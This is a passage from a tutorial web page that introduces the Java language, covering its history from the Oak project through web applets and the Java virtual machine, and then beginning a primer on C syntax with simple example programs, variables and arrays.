<li><p class="first">Ignore the comment about not putting files in <tt class="docutils literal">/var/www</tt> — while it should be followed in general, it will make it hard for you to edit files on code.runnable.com if you put them outside <tt class="docutils literal">/var/www</tt>.</p> </li> <li><p class="first">After you have run <tt class="docutils literal">startproject</tt> in the tutorial, you will need to find the <tt class="docutils literal">settings.py</tt> file and make an adjustment. Find the block that defines <tt class="docutils literal">MIDDLEWARE_CLASSES</tt> and remove the line:</p> <div class="highlight"><pre class="code python literal-block"><span></span><span class="s1">'django.middleware.clickjacking.XFrameOptionsMiddleware'</span><span class="p">,</span> </pre></div> <p>This middleware is an important security feature, but it interferes with the way that runnable.com displays your project in a frame (in its normal workflow), and without this change you will be presented with a blank page after you press ‘Run’.</p> </li> <li><p class="first">When it comes to running the your Django project, the easiest way is if you use the green ‘Run’ button, but adjust the command. Click on the gear icon to configure it, and change the command to:</p> <pre class="literal-block"> cd /var/www/mysite; python manage.py runserver 0.0.0.0:80 </pre> <p>Now press the ‘Run’ button.</p> </li> </ul> <p>And that’s it! You should be able to complete the tutorial with these adjustments.</p> </div> <div class="section" id="what-next"> <h2>What next?</h2> <p>I hope this has been helpful! Please comment with any corrections.</p> <p>To go further, you’ll probably want to have a look at <a class="reference external" href="">Getting started with Django</a>.</p> </div> Wedding hacks - seating planner using simulated annealing2013-09-06T23:50:07+00:002013-09-06T23:50:07+00:00Luke Plant<p class="first last">Some attempts to solve the seating headache with software.</p> <p>This is the third in a seris of posts in which my upcoming wedding has exercised my programming skills.</p> <div class="section" id="the-problem"> <h2>The problem</h2> <p>There are a lot of ways to seat approx 130 guests in tables of 10.</p> <p>(Digression: how many ways?</p> <p>There are n! ways to order a list of n people.</p> <p>However, we then group that list of n people into j groups (tables) of size k each (assuming an exact division is possible for simplicity).</p> <p>In each group, there are k! different ways to order the people, but all these are considered equivalent for our purposes (we don’t care what order people are listed within a table). So we divide by k!, and do it j times, once for each table.</p> <p>We could then shuffle all the groups, and all the results of such shuffling are also considered equivalent. So we divide by j! to count for these permutations.</p> <p>So, I make it: n!/((k!^j)*j!)</p> <p>(You can get the same formula by considering ‘n choose k’ to choose the people for the first table, multiplied by ‘(n-k) choose k’, for the second, etc., with n reducing by k each time as the pool of available people shrinks, dividing by j! to account for permutations of tables, and simplifying).</p> <p>Or, in my case:</p> <p</p> <p>Or:</p> <p>5.489002294953296e+124</p> <p>But my maths is shockingly bad — corrections in comments are welcome! Whether I’ve got it right or not, there are still definitely lots of potential arrangements…</p> <p>[Edit 2014-02-28: previous incorrect formula got me a larger figure, 2.201437978814401e+202]</p> <p>End of digression…)</p> <p>So, we haven’t got into the business of doing the table plan yet, but this is such a nice programming puzzle that I couldn’t resist starting now (and we probably need to get a move on if we are to get this done…).</p> <p>I found one commercial solution, <a class="reference external" href="">Perfect Table Plan</a>, but:</p> <ul class="simple"> <li>It doesn’t run on Linux :-(</li> <li>It’s not free</li> <li>It’s already written, which is half the fun!</li> </ul> <p>I found a <a class="reference external" href="">paper</a> tackling the problem, but:</p> <ul class="simple"> <li>No source code!</li> <li>It required a commercial software package, <span class="caps">GAMS</span> with the <span class="caps">CPLEX</span> solver.</li> <li>On some pretty hefty hardware, running the solver still took 36 hours.</li> </ul> <p>So I wrote my own. I used a model very similar to the one given in the paper, with some tweaks.</p> <p>The idea is that you define a matrix of connections, with a zero indicating that the people don’t know each other, 1 that they do know each other, plus 50 indicating that they must be together, and negative numbers for people who should be kept apart!</p> <p>You then use this matrix to rate different potential seating plans — essentially trying to maximise the strength of connections on tables, summed over all people. In order to explore the possible solutions, I’m using <a class="reference external" href="">simulated annealing</a>, and a <a class="reference external" href="">simulating annealing Python module</a> that I found.</p> </div> <div class="section" id="user-interface"> <h2>User interface</h2> <p>Defining a matrix for how 130 people know each other is a challenge. I’ve created a <span class="caps">UI</span> with a grid, and added controls to make it easy to enter connections for groups of people together. This provides a reasonable solution, but a grid 130x130 is a bit of a pain.</p> <p>The <span class="caps">UI</span> is all in a web browser, with the main algorithmic code running server side, written in Python. I’ve used <a class="reference external" href="">Flask</a> as the web framework, instead of <a class="reference external" href="">Django</a> which I almost always use, since it is nice and light, and I don’t need an <span class="caps">ORM</span> or admin etc.</p> <p>I also discovered a few tricks along the way.</p> </div> <div class="section" id="web-tricks"> <h2>Web tricks</h2> <p.</p> <p>For downloading data, I’ve found a trick using an iframe with an auto-submitting <span class="caps">POST</span>.</p> <p>For uploading data, within a single page app, there is now a way to do this <a class="reference external" href="">using <span class="caps">XHR</span></a>, at least for modern browsers. I then have a simple view which again just echoes the data back client-side, allowing me to use a browser’s normal file upload mechanism to get the data back into the client-side app.</p> </div> <div class="section" id="algorithm"> <h2>Algorithm</h2> <p.</p> <p.</p> <p>So, basically, it is too utilitarian. Or it doesn’t weigh the misery of being alone strongly enough.</p> <p>Second, I suspect that the solution space is just too large to explore. Simulated annealing requires you to define a ‘move’ function, to change the system from one state to a nearby one. I just swap two random people on two random tables.</p> <p.</p> <p.</p> <p>I have very little experience with this kind of code, so it is fun to be stretched in this direction!</p> </div> <div class="section" id="pypy"> <h2>PyPy</h2> <p>Since this is highly algorithmic code, I experimented with PyPy.</p> <p>Initially I found PyPy was actually a bit slower. However, my code uses lists of integers to represent people, and originally I used ‘None’ as a sentinel value to represent an empty seat. I realised this might be killing PyPy’s <span class="caps">JIT</span>. Switching to a sentinel value of ‘-1’ gave me approximately 5x to 10x improvement with PyPy. So it is now worth using PyPy.</p> <p>Other than that one optimisation, I’ve done very little, so there are probably big ways the code could be improved.</p> </div> <div class="section" id="source-code"> <h2>Source code</h2> <p>It’s all free, and on BitBucket:</p> <p><a class="reference external" href=""></a></p> …</p> <p>[Update: having let it work for a longer run of a few hours, the results are surprisingly good. It has at least managed to satisfy all of the ‘50’ connections, grouping families of up to 6 together, and managing to get other ‘50’ couples onto the same table. And so far, the only examples I can find of people without any friends on a table are people for whom I haven’t put in any connection info yet. I’m impressed! But it still lacks that human touch…]</p> </div> Wedding hacks - John Lewis gift list hyperlink2013-09-06T23:12:50+00:002013-09-06T23:12:50+00:00Luke Plant<p class="first last">Using my programming skills for higher purposes, part 1</p> <p>I’m getting married in 3 weeks time - yay!</p> <p>But this post isn’t about that — it’s a quick programming-and-wedding-related tip.</p> <p>We set up a <a class="reference external" href="">John Lewis gift list</a>, but we found the web site’s instructions for use could be improved.</p> <p>The instructions to pass on to potential givers were:</p> <ol class="arabic simple"> <li>Go to this site</li> <li>Type in this gift list number</li> </ol> <p>That’s fine for printed instructions, but if you already have a website, there is this magical thing called a <strong>hyperlink</strong> which should be able to take you straight there, without any error prone typing etc. John Lewis didn’t provide any instructions for doing this, and as the number never appears in a <span class="caps">URL</span>, even after this point, it isn’t obvious that there is a way to do it.</p> <p>However, I managed to impress my fiancée with my leet hacking skills to get around this. <span class="caps">OK</span>, so I right clicked at an appropriate place, chose “Inspect element”, applied some knowledge of web development and made a few easy guesses. I came up with the following <span class="caps">URL</span> which works, and will take you straight to your gift list:</p> <p><tt class="docutils literal"><span class="pre"><span class="caps">YOURNUMBER</span></span></tt></p> <p>Just replace <span class="caps">YOURNUMBER</span> with your actual number.</p> <p>That’s all for now - but further wedding-inspired posts are to follow!</p> MVC is not a helpful analogy for Django2013-06-25T13:22:01+00:002013-06-25T13:22:01+00:00Luke Plant<p class="first last">We should just introduce people to <span class="caps">MVT</span></p> <p>Sometimes <a class="reference external" href="">Django</a> is described as <span class="caps">MVC</span> — Model-View-Controller. The problem with that is that people will either:</p> <ul class="simple"> <li>come with baggage from existing <span class="caps">MVC</span> frameworks, which might be nothing like Django,</li> <li>or end up at something like the <a class="reference external" href="">wikipedia page on <span class="caps">MVC</span></a>, which describes an architecture which is very unlike Django’s.</li> </ul> <p>The classic <span class="caps">MVC</span> architecture is about managing state. Suppose you have a <span class="caps">GUI</span> that allows you to, say, view and edit a drawing:</p> <ul class="simple"> <li>You’ve got to store the drawing in memory somewhere.</li> <li>You’ve got to display the drawing on the screen.</li> <li>You have controls that allow you to modify the drawing e.g. change the colour of a shape.</li> <li>And you’ve got to display the changes when that happens.</li> </ul> <p>The controller tells the model to change, and the model notifies the view in some way (preferably by some kind of pub/sub mechanism that allows the view to be fairly decoupled from the model).</p> <p><span class="caps">MVC</span>.</p> <p>Django’s Model-View-Template is quite different from this.</p> <p>In <span class="caps">MVT</span>, there is no state. There is only data. For the purposes of most <span class="caps">HTTP</span> requests (<span class="caps">GET</span> requests), the data in the database is treated as an immutable data input, not state. It could be said that the name ‘view’ is misleading, since it implies reading, not writing, i.e. <span class="caps">GET</span> requests not <span class="caps">POST</span> requests. A better name might be ‘handler’, because it handles an <span class="caps">HTTP</span> request, and that is the terminology used by most Django <span class="caps">REST</span> frameworks.</p> <p>In <span class="caps">HTTP</span>,.</p> <p>But when it comes to responding to an <span class="caps">HTTP</span> request, Django’s <span class="caps">MVT</span> has a complete lack of state. Many web pages are essentially pure functions of the inputs — an <span class="caps">HTTP</span> request and the data in the database — so it is clear that <span class="caps">MVT</span> is not intrinsically about state.</p> <p>Of course, there is data modification. <span class="caps">POST</span>:</p> <ul class="simple"> <li>throws away all the state (i.e. the current state of the browser), with the exception of the pieces of state that identify what the user was looking at - the <span class="caps">URL</span>, and the site’s cookies.</li> <li>causes a brand new <span class="caps">HTTP</span> request asking for the document. The server responds completely from scratch: it doesn’t notify the view function or the template, it runs over from the beginning.</li> </ul> <p>So, if anything changed, the approach is “cancel everything, start again from the beginning”.</p> <p>And for the actual handling of <span class="caps">POST</span> requests within Django, you have a similar approach. Once the data has been updated (typically, a <span class="caps">SQL</span> <span class="caps">INSERT</span> or <span class="caps">UPDATE</span>), you send back an <span class="caps">HTTP</span> redirect to do a <span class="caps">GET</span> — “something changed, let’s start again from the beginning”. This is why Django’s <span class="caps">ORM</span> <a class="reference external" href="">does not have an identity mapper</a>. The model for handling state is to ignore it altogether, and just start again whenever you know that something has changed.</p> <p>This is exactly the opposite of the way classic <span class="caps">MVC</span> apps work (including client-side, Javascript <span class="caps">MVC</span> frameworks) — they are all about avoiding starting again, and having live systems that can be informed about updates and keep everything in sync, by sending message between them.</p> <p>There is a second aspect to <span class="caps">MVC</span>, which is separation of concerns. If you think of <span class="caps">MVC</span> as meaning “separation of code that stores data, code that displays data, and code that handles requests for data to be changed or displayed”, then Django does indeed fit that pattern.</p> <p>But I don’t think the classic description of <span class="caps">MVC</span> is a helpful starting point at all. <span class="caps">HTTP</span> is different, and has its own needs which have given birth to its own architectures.</p> <div class="section" id="what-difference-does-this-make"> <h2>What difference does this make?</h2> <p>First, we can avoid unhelpful comparisons that just confuse. The best way to understand how <span class="caps">MVT</span> works is to try it. You have to learn something about <span class="caps">HTTP</span> - a view function is a bit of code that handles an <span class="caps">HTTP</span> request and returns an <span class="caps">HTTP</span> response. Analogies to systems that are not like <span class="caps">HTTP</span> are not going to help that much.</p> <p>Second, we can avoid trying to shoe-horn Django applications into a mold created by a different architecture. I believe <span class="caps">MVC</span> apps will provide very little guidance about how to structure code in Django apps.</p> <p>In particular, I kind of disagreed with the post <a class="reference external" href="">Know Your Models</a> by Hynek Schlawack. It starts with the assumption of classic <span class="caps">MVC</span>, <span class="caps">MVC</span> is supposed to enable you to do.</p> <p>I do agree with the approach of creating an <span class="caps">API</span> on your models that you want to use from view functions. So, for example, I tend to eschew all direct <tt class="docutils literal">.filter()</tt> calls in view functions, preferring methods on models that can be tested independently. But I think the analogy with <span class="caps">MVC</span> can lead you in an unhelpful direction for many Django apps.</p> <p>So, to contradict Hynek:</p> <ul> <li><p class="first".</p> <p>Further, if you put business logic in separate classes, rather than on your Django Model, it will be hard to re-use it in the admin and other ModelForms.</p> </li> <li><p class="first">In my experience, the data model usually <em>has</em> been constructed with your application in mind. If it hasn’t, you are going to have an extremely painful time.</p> <p>If your database allows only one email address per customer, then your application is going to reflect that. If your schema changes so that now you have multiple, the change will ripple right the way through your application (in most cases). <span class="caps">MVT</span> is not supposed to insulate you from that.</p> <p>You can’t really build an application on top of a database that wasn’t designed for it, unless you are using it is a key-value store or something.</p> </li> <li><p class="first">The database isn’t global state, it is global data. It doesn’t vary over the lifetime of an <span class="caps">HTTP</span> request being handled. As soon as it has changed, you send a redirect and start again.</p> </li> </ul> <p>Hynek’s approach can be necessary sometimes, but it adds a layer of complexity and indirection that itself can be deadly. Sometimes this is even worse for bigger projects — you are adding more complexity and indirection to a project that was already large.</p> <p>When I write Django apps, I’m regularly making changes to the database schema, constantly making it match the exact and changing needs of the application. It is then easy to use the Django Model as a great basis for an <span class="caps">API</span>, and keep things as simple as possible.</p> <p>There are other differences of approach in this, of course. Do you regard the database as merely a persistence mechanism for your application, or do you regard the database as an integral part of your application — probably the most important part?</p> <p>I actually tend towards the latter — to call an <span class="caps">RDMS</span> like Postgres a persistence mechanism is pretty insulting. That means I lean far more heavily on the database, so that I’m not embarrassed to make use of an extremely powerful <span class="caps">RDMS</span> that can do all kinds of things, like constraint checking, transactions, triggers etc. With that mindset, testing your application by necessity involves testing what happens to your database for different <span class="caps">HTTP</span> inputs, rather than simply checking a ‘model layer’.</p> <p>If there are bits of logic that can be separated out easily from the database, and tested more easily, by all means do that. But I wouldn’t make that the goal of my architecture.</p> </div> Full screen WebView Android app2012-12-19T23:08:00+00:002012-12-19T23:08:00+00:00Luke Plant<p class="first last">A complete WebView Android app, full screen, with a progress bar and back button that works as normal</p> <p>I decided to make an Android app for my <a class="reference external" href="">Bible memory verse site</a> .</p> <p>I tried <a class="reference external" href="">appsgeyser</a>, but discovered they put adverts on your site, which I definitely don’t want — this is an entirely free app, for a free (and ad-free) site.</p> <p>My requirements are:</p> <ul class="simple"> <li>Full screen<ul> <li>without any controls ever popping up, because you don’t need them.</li> </ul> </li> <li>Progress bar for page loading.</li> <li>Javascript works.</li> <li>Links work as expected.</li> <li>Back button works like builtin browser, until you get back to the home page, where it will cause the app to exit.</li> </ul> <p>There are lots of pages and wizards with solutions for bits of these, but putting them together turned out to be harder — for example, it seems that the normal way of showing a progress bar for the whole window doesn’t work if you’ve gone full screen.</p> <p>Anyway, I’ve completed the <a class="reference external" href="">learn scripture app</a> (ha, my first Java app!), and thought I’d share the <a class="reference external" href="">complete source code</a>.</p> <p>If you wanting a similar app, you are probably best creating your basic app structure using a wizard, but it is helpful to see a complete solution. The important bits are:</p> <ul class="simple"> <li>permissions for Internet access: <a class="reference external" href="">AndroidManifest.xml</a></li> <li>the <a class="reference external" href="">main activity source code</a></li> <li>the <a class="reference external" href="">main layout definition</a></li> </ul> Why> Reasons to love Django, part x of y2012-05-19T14:12:19+00:002012-05-19T14:12:19+00:00Luke Plant<p class="first last">I’ve probably written lots of blog posts on this, so I can’t claim ‘x’ = 1, and I’ve no idea what ‘y’ is…</p> <p>I needed to add a boolean field to a model. For many web apps, this typically involves:</p> <ol class="arabic simple"> <li>modifying the model layer, so that the field becomes available as an attribute on retrieved objects, and can be queried against etc.</li> <li>creating a database migration script that can be run immediately on the development box, and later for staging and production.</li> <li>running the migration against the development <span class="caps">DB</span>.</li> <li>updating any admin screens for editing the field.</li> <li>checking the changes and scripts into source control.</li> <li>deploying - including pushing source code and running migration scripts etc.</li> </ol> <p>Using <a class="reference external" href="">Django</a>, from a cold start (no editor/<span class="caps">IDE</span> open), this just took me <strong>1 minute 45 seconds of work</strong> for steps 1 - 5, and an additional 45 seconds waiting for step 6, total 2 minutes 30 seconds, and I wasn’t rushing.</p> <p>Step 1 is a one line code addition. Pretty much everything else can and should be generated automatically.</p> <p>Step 2 is taken care of by a one line command using <a class="reference external" href="">South</a>, as is step 3 and the database part of step 6 (which is run de-rigueur from my deployment scripts).</p> <p>Step 4 is taken care of by Django’s admin, which introspects the model and generates the right form for you.</p> <p>This is one of the reasons I love Django. It’s not so much the time it saves, although that is pretty awesome, it’s the <em>tedium</em> it saves.</p> <p>This is also one of the reasons I’m not very tempted by schema-less or schema-light databases, because with Django a nice strict schema brings so little administrative overhead. I was going to have to add <em>something</em> about the change to the model anyway, even if it was only documentation, and having done that in one place, the other additional changes required by a relational <span class="caps">DB</span> with strong schema placed virtually no burden on me.</p> <p>(Of course, things could be more complex on bigger apps, especially if the table is large or sharded. But then again, there’s no reason why rolling out your <span class="caps">DB</span> change shouldn’t be just as automated - it’s only the ‘waiting’ stage that <em>has</em> to take longer for a simple change like adding a column. If the coding/work part is taking much longer than the above example, your tools probably need fixing or replacing.)</p> WordShell - WordPress command line admin utility2012-05-10T14:51:29+00:002012-05-10T14:51:29+00:00Luke Plant<p class="first last">A nice tool developed by a friend of mine.</p> <p>A friend of mine has developed a <a class="reference external" href="">command-line utility for managing many WordPress installations - WordShell</a>.</p> <p>I don’t use WordPress myself, but having been totally converted to tools like <a class="reference external" href="">fabric</a> for managing remote sites, I’m sure this tool would be invaluable if you need to manage WordPress sites.</p> | https://lukeplant.me.uk/blog/categories/web-development/atom/index.xml | CC-MAIN-2017-39 | refinedweb | 11,608 | 50.46 |
Introduction
With the increasing of Sandbox technology usage, every penetration tester should be prepared to face it one day. While a plenty of Pentest tools are out there, forging your own code can help you in this tough case where those tools fail.
Recently we’ve been doing a black box penetration testing for one of our clients where social engineering and client side attacks are allowed. During the information gathering phase, we suspected that they were using Sandbox technology along with signature based AV to protect a specific critical -obviously- part of the domain. Thankfully, our reconnaissance result turns out that one of the system admins was searching around in forums for free software to automate a certain task. The task was doable however, bypassing Sandbox analysis was my main concern. Let’s see how useful that output was for us and take a closer look on the coding part!
In this article, I will share part of the code which I actually used to trick the Sandbox and gain the administrator trust to run the script. Please keep in mind that the actual script contained the task which the admin was seeking in the first place, otherwise it would raise her suspicions.
Approach
Below are some methods used by malware developers to detect and escape from Sandbox environment as documented by FireEye researchers:-
-.
In our scenario, using a human interaction method was the most suitable one. Since our victim was looking for a script that we will provide in the first place, it wouldn’t hurt to add a simple check-box dialog to provide some options where the victim has to choose in order to proceed for code execution.
Action Plan
- Create a script that makes changes to the OS, such as opening a port and add a registry value.
- Submit it against online Sandbox analyzer, such as Malwr, which is based on open source Cuckoo.
- Add the evasion technique to our script.
- Test again and see the difference.
Phase 1, 2
One of the favorite things for a hacker is to add a registry key for persistence purpose. There must also be a way to communicate between the hacker and his victim. Let’s write up a quick Python code to parse windows registry and add a string value, as well as open a TCP port.
import _winreg as wreg import socket # part 1 key = wreg.OpenKey(wreg.HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run",0, wreg.KEY_ALL_ACCESS) wreg.SetValueEx(key, 'Backdoor', 0, wreg.REG_SZ,'C:\\bla.exe') key.Close() # part 2 s = socket.socket() host = socket.gethostname() port = 80 s.bind((host, port)) s.listen(5)
The code is quite simple, . in In the first part we opened a registry directory Software \ Microsoft \ Windows \ CurrentVersion \ Run then we added a string value called “Backdoor” as well as a data value pointing to an exe directory (‘C:\\bla.exe’)
The second part will just open a port 80 and listen for incoming connection on the port.
Next, I used Pyinstaller to export the script into exe format. I named the file Sandboxing.exe and submitted into Malwar website, in summary the analysis output could detect our actions as you can see below
-For the full analysis report, please see
Phase 3, 4
Now is the fun part. As I stated earlier, we need to create a check-box dialog window where the user must click, first, on one of the provided check-box list, then secondly on the continue button.
Important note: Cuckoo is intelligent enough to bypass a regular Messagebox trick. Therefore, in our code we forced the user to do a couple of actions, tick a check box then click on Continue button.
from Tkinter import * master = Tk() def evasion(): def donothing(): # …………… 1 # Do nothin' pass master.protocol("WM_DELETE_WINDOW", donothing) # when X is clicked, do nothing # …………… 2 Label(master, text=" Choose Your Editing Type: ").grid(row=0, sticky=W) var1 = IntVar() Checkbutton(master, text=" Online Editing ", variable=var1).grid(row=1, sticky=W) var2 = IntVar() Checkbutton(master, text=" Offline Editing ", variable=var2).grid(row=2, sticky=W) # …………… 3 def quit(): if var1.get() == 1 or var2.get() ==1: master.destroy() Button(master, text='Continue', command=quit).grid(row=4, sticky=W, pady=4) mainloop() # …………… 4 evasion()
I used a very popular Python library called Tkinter to do the GUI job for me, . first First we created an object called master, then under evasion function
(1)We disabled the “X” button.
(2)Creating a label text message with two check buttons – two trivial options are created here for “online” and “offline” editing.
(3)Create a continue Button, once clicked, it will destroy the dialog window if and only if one of the check boxes have been ticked first,first; we achieved this using the quit function.
(4)Keep in mind without destroying this window,window; our malicious code (opening a port and add a registry key) will not be executed.
The end result is something similar to
Wrapping up the complete code:-
from Tkinter import * master = Tk() def evasion(): def donothing(): # Do nothin' pass master.protocol("WM_DELETE_WINDOW", donothing) # when X is clicked, do nothing Label(master, text=" Choose Your Editing Type: ").grid(row=0, sticky=W) var1 = IntVar() Checkbutton(master, text=" Online Editing ", variable=var1).grid(row=1, sticky=W) var2 = IntVar() Checkbutton(master, text=" Offline Editing ", variable=var2).grid(row=2, sticky=W) def quit(): if var1.get() == 1 or var2.get() ==1: master.destroy() Button(master, text='Continue', command=quit).grid(row=4, sticky=W, pady=4) mainloop() evasion() import _winreg as wreg import socket key = wreg.OpenKey(wreg.HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run",0, wreg.KEY_ALL_ACCESS) wreg.SetValueEx(key, 'Backdoor', 0, wreg.REG_SZ,'C:\\bla.exe') key.Close() s = socket.socket() host = socket.gethostname() port = 80 s.bind((host, port)) s.listen(5)
Once again, exporting the script into exe, submitting into Malwr, but this time the result didn’t mention anything on opening a port or a registry key.
For the full analysis report, please see
However, if you run it under a live environment, you would see the final result as
Wonderful!!
Think out of the box
Based on the first analysis report, the Malwr binds an IP of 192.168.56.X to port 80, this subnet mask looks very family to VirtualBox users since it’s exactly the same subnet used by VirtualBox host-only interface. Do you think that this info can help in bypassing VM environment? Please share your thoughts in the comment section.
References
- Evading File-based Sandboxes, by FireEye team
- Malwr Services | http://resources.infosecinstitute.com/case-study-evading-automated-sandbox-python-poc/ | CC-MAIN-2018-30 | refinedweb | 1,098 | 57.37 |
« Return to documentation listing
MPI_Keyval_free - Frees attribute key for communicator cache attribute
-- use of this routine is deprecated.
#include <mpi.h>
int MPI_Keyval_free(int *keyval)
INCLUDE 'mpif.h'
MPI_KEYVAL_FREE(KEYVAL, IERROR)
INTEGER KEYVAL, IERROR
keyval Frees the integer key value (integer).
IERROR Fortran only: Error status (integer).
Note that use of this routine is deprecated as of MPI-2. Please use
MPI_Comm_free_keyval instead.
This deprecated routine is not available in C++.
Frees an extant attribute key. This function sets the value of keyval
to MPI_KEYVAL_INVALID. Note that it is not erroneous to free an
attribute key that is in use, because the actual free does not tran-
spire until after all references (in other communicators on the
process) to the key have been freed. These references need to be
explictly freed by the program, either via calls to MPI_Attr_delete
that free one attribute instance, or by calls to MPI_Comm_free that
free all attribute instances associated with the freed communicator._Keyval_free(3) | http://icl.cs.utk.edu/open-mpi/doc/v1.3/man3/MPI_Keyval_free.3.php | CC-MAIN-2016-18 | refinedweb | 161 | 57.27 |
part 12 is something I think I am not able to solve. My code was this:
// Template, major revision 3 // IGAD/NHTV - Jacco Bikker - 2006-2009 #include "string.h" #include "surface.h" #include "stdlib.h" #include "template.h" #include "game.h" using namespace Tmpl8; class Tank { public: Tank() { x = 0; y = 4 * 64; rotation = 0; } void Move( Surface* a_Screen) { x++; if ( x > ( 16 * 64 ) ) x = 0; tank.Draw( x, y, a_Screen ); } int x, y, rotation; }; Tank mytank; void Game::Init() { } void Game::Tick( float a_DT ) { mytank.Move( m_Screen ); }
The errors I got:
1>c:\-\part12\game.cpp(25) : error C2065: 'tank' : undeclared identifier
1>c:\-\part12\game.cpp(25) : error C2228: left of '.Draw' must have class/struct/union
I thought it was weird, since this is exactly what was written in the tutorial. Luckily, I thought I understood the problem, so I
changed 'tank.Draw' to 'Tank.Draw'. Unfortunately, this gave me these errors (both the same?):
1>c:\-\part12\game.cpp(25) : error C2143: syntax error : missing ';' before '.'
1>c:\-\part12\game.cpp(25) : error C2143: syntax error : missing ';' before '.'
This is where I got stuck..does anyone know how to solve this problem?
Rimevan | http://devmaster.net/forums/topic/16018-problem-with-c-tutorial-part-12-classes/page__p__83815?forceDownload=1&_k=880ea6a14ea49e853634fbdc5015a024 | CC-MAIN-2013-20 | refinedweb | 197 | 71.31 |
When i try to run "python -m designer" command i get this error:
File "designer/app.py", line 14, in <module>
from designer.components.dialogs.add_file import AddFileDialog
File "designer/components/dialogs/add_file.py", line 5, in <module>
from kivy.garden.xpopup.file import XFileOpen, XFolder
ImportError: No module named xpopup.file
I have installed Kivy Designer on Ubuntu 16.04 LTS and Windows 10. I have problem running Kivy Designer on Ubuntu 16.04 LTS and it always crash. But I have no problem running in on Windows 10 64-bits using Python 3.6.2. You have to do the following:
To install the XPopup enter a console (on Windows use kivy.bat in the kivy folder):
garden install xpopup | https://codedump.io/share/TC8XajLzfXrA/1/quotno-module-named-xpopupfilequot-error-when-try-to-run-kivy-designer | CC-MAIN-2019-26 | refinedweb | 122 | 54.29 |
Java is a trademark of
Sun Microsystems, Inc.
This tutorial introduction to Java is intended to provide some familiarity with the
language syntax, its capabilities, and the history of its development. In conjunction
with our pages on
Smalltalk and
C++,
it will help in comparing various object-oriented programming languages (OOPLs).
(Also see our
OOPL comparison chart.)
At the end of this page, there are links to more information
about Java, including how to download the Java development kit and several free Java
development environments.
This tutorial assumes no previous knowledge of Java or C, but does assume that
the reader has done programming in some computer language. It also assumes familiarity with
object-oriented concepts.
During the late 1980s and early 1990s, several candidates competed
to fill the role of "a better C" (to use the term applied by
Bjarne Stroustrup to C++).
"A better C" was generally taken to mean a programming language that was comfortable
to programmers trained in the C language, eliminated some of the known problems with C,
was capable of high performance, and incorporated modern object-oriented features.
C++, for a while the leading contender, emphasized compatibility and performance.
Objective-C sacrificed some C compatibility for the sake of a "purer" approach to
object-orientation based on Smalltalk.
The apparent winner, however, is a relative latecomer, Java. (Though a recent entrant into the
field, Microsoft's
C#, may contest the title.)
Java didn't set out to be a better C for every programmer, and in fact had an identity crisis
early in its life. It started out in 1991 as a language called "Oak", part of a small project
called the "Green Team" initiated by Patrick Naughton, Mike Sheridan, and
James Gosling, who is primarily credited with the design of the language that became Java.
(Bryan Youmans has a page on the
history of Java, with some interesting thoughts on the language design. There's also an
official version of the history from Sun.)
The original goal of the Green Team was to produce a single operating environment that
could be used for controlling a wide range of consumer devices such as video games and
TV set-top boxes. A key part of the environment would be a programming language that
was completely independent of the processor it ran on. The image of "Duke" (shown at right),
well-known as the Java mascot, dates from this period; Duke represented a software agent who
performed tasks on behalf of the end user.
As it turned out, targeted industries such as cable TV were not ready for the concepts
the Green Team was selling, but the kind of active, user-selected content they had
envisioned was emerging in a new medium: The Internet.
So in 1995, Java found a market: Delivering a new level of interactivity
to client browsers on the World Wide Web. Its ability to run the same code on any
processor ("write once, run anywhere" was the slogan) was exactly what was needed
to download chunks of code called "applets" to be run on a heterogeneous universe
of client architectures.
An example of a Java applet providing "active content" in a web page is shown at right.
This is a molecule viewer displaying a molecule of the sodium salt of hyaluronic acid.
By holding down the left mouse button and moving the mouse, you can rotate the molecule
around an axis aligned in any direction in the plane of the page.
(If you're interested, here's the Java source code for
this applet. Originally developed at the University of Leeds, it is shipped by Sun as a demo
with the
Java Development Kit.)
You are seeing an example of the fact that the 'write once, run anywhere' hype is not totally
true. Your browser understands the <APPLET> tag but isn't running the Java code.
Possibly the Java runtime environment is not installed - consult your browser documentation
for help.
In 1995, the sense was, as
Wired put it, that "Java holds the promise of caffeinating the Web, supercharging it
with interactive games and animation and thousands of application programs nobody's even thought
of". Nearly a decade later, with many other technologies available for delivering active
content, Java applets play a minor role. Java has prospered, though, running on middleware
servers and even mainframes. It may even be coming full circle with Sun's
EmbeddedJava and
Wireless Java, which promise to make Java the kind of ubiquitous platform the
Green Team originally envisioned.
The technology that allows Java applets to be downloaded and run on many different
client machines is called the
Java virtual machine (JVM), and is similar to the virtual machine that is
the runtime engine for Smalltalk systems. Most computer languages are compiled from
source code into machine language specific to the computer on which they will run.
On the web, it is not feasible to dynamically compile applets when they run.
So Java is normally compiled into low-level, machine-independent bytecodes,
which form the module that is downloaded to a client machine and executed by
the JVM resident on the machine. A full discussion is beyond the scope of this
tutorial, but virtual machine architectures have proved to be a relatively simple
way to provide language support across a broad range of machine architectures.
The downside of virtual machines is that they cannot provide
performance equivalent to fully compiled code. However, experience with Smalltalk and
Java has shown that performance is adequate for most applications, and that
certain techniques allow VMs to come very close to the performance of native
compilation. VMs also have the advantage that they can enforce dynamic runtime constraints,
such as security rules that are essential for running active content in web browsers.
Since we are primarily presenting the Java language here, the JVM and
other non-language aspects of the Java platform will not be discussed further.
The Java language is based on C, so it is first necessary to know a little about the C
Language. If you are already familiar with C, you can skip the next section. If not,
please read it, since many of the operators and logic control constructs of C are
used almost identically in Java.
The following, from the famous
Kernighan and Ritchie book, is a simple C program:
#include <stdio.h>
main () // A very simple program
{
printf("hello, world\n");
}
The #include embeds definitions from the standard I/O
library needed for the printf statement. Every C
program has a main() function, which is called when the
program is executed. Braces ( { } ) delineate blocks of
statements, in this case the single statement making up the body of
main(). This statement prints
"hello, world" when the program is executed ("\n" is the code for line feed, i.e., it indicates a line
termination). The semicolon terminates a statement. The double quote is the character string delimiter
in C; the comment delimiter is a double slash (//). Comments may also be delimited by
bracketing them with "/*" and "*/".
Variables in C may be primitive types, such as characters and numbers:
char c = 'c'; // Character
int i = 10; // Integer
double x = 12.34 ; // Floating point number
Each of the statements above does two things: it declares the variable to
be a certain type, e.g., int (integer),
and it also sets the value of the variable. We could just as well do these
two things in separate statements:
int i;
i = 10;
Every variable must be declared, however, before it can be used.
Variables may also be arrays of primitive types:
char c[] = {'c', 'h', 'a', 'r'}; // Array of characters (string)
char c[] = "char"; // Alternative way of initializing a string
int i[] = {2, 3, 5, 7}; // Array of integers
Arrays are referenced by the index of their elements, starting at zero
for the first element; e.g., c[3]
returns 'r'. (Some other
